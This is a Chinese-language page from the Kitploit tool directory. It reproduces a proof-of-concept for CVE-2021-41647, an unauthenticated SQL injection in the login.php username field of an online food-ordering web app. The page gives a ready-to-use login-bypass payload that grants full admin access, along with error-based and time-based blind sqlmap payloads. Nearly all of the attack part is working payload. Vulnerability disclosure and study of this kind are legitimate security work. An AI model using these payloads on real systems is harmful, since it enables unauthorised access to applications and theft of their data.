Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-41647 | Kitploit
工具/GitHubGitHub/mobiusbinary/cve-2021-41647
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试学习与教育
GitHubmobiusbinary/cve-2021-41647

CVE-2021-41647

查看仓库
4年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-41647

CVE-2021-41647 Online-Food-Ordering-Web-App 中的 SQL 注入漏洞

Online-Food-Ordering-Web-App 存在未经验证的错误型和时间型盲 SQL 注入攻击漏洞。 /login.php 页面上的 username 参数未对用户输入进行清理,攻击者可以使用简单的绕过技术绕过登录。

应用链接

Online-Food-Ordering-Web-App

受影响的组件与参数

URL: /login.php
参数: username

POC

登录绕过 PAYLOAD

要绕过用户登录并获得完全的管理员访问权限,请在 username 输入框中输入以下 payload: user' or 1=1-- -

SQLMAP PAYLOADS

参数: username (POST 请求) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=test'||(SELECT 0x6d65686d WHERE 8694=8694 AND (SELECT 8639 FROM(SELECT COUNT(*),CONCAT(0x71626a7a71,(SELECT (ELT(8639=8639,1))),0x71766a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&password=asdfasdrf

Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=test'||(SELECT 0x6d6d6367 WHERE 7580=7580 AND (SELECT 4416 FROM (SELECT(SLEEP(5)))nUhT))||'&password=asdfasdrf

如果 POC 图片不清晰,请点击 GIF,将以更好的分辨率加载。

POC

发现者

Jason Colyvas
MOBIUSBINARY
2021年9月20日

下载工具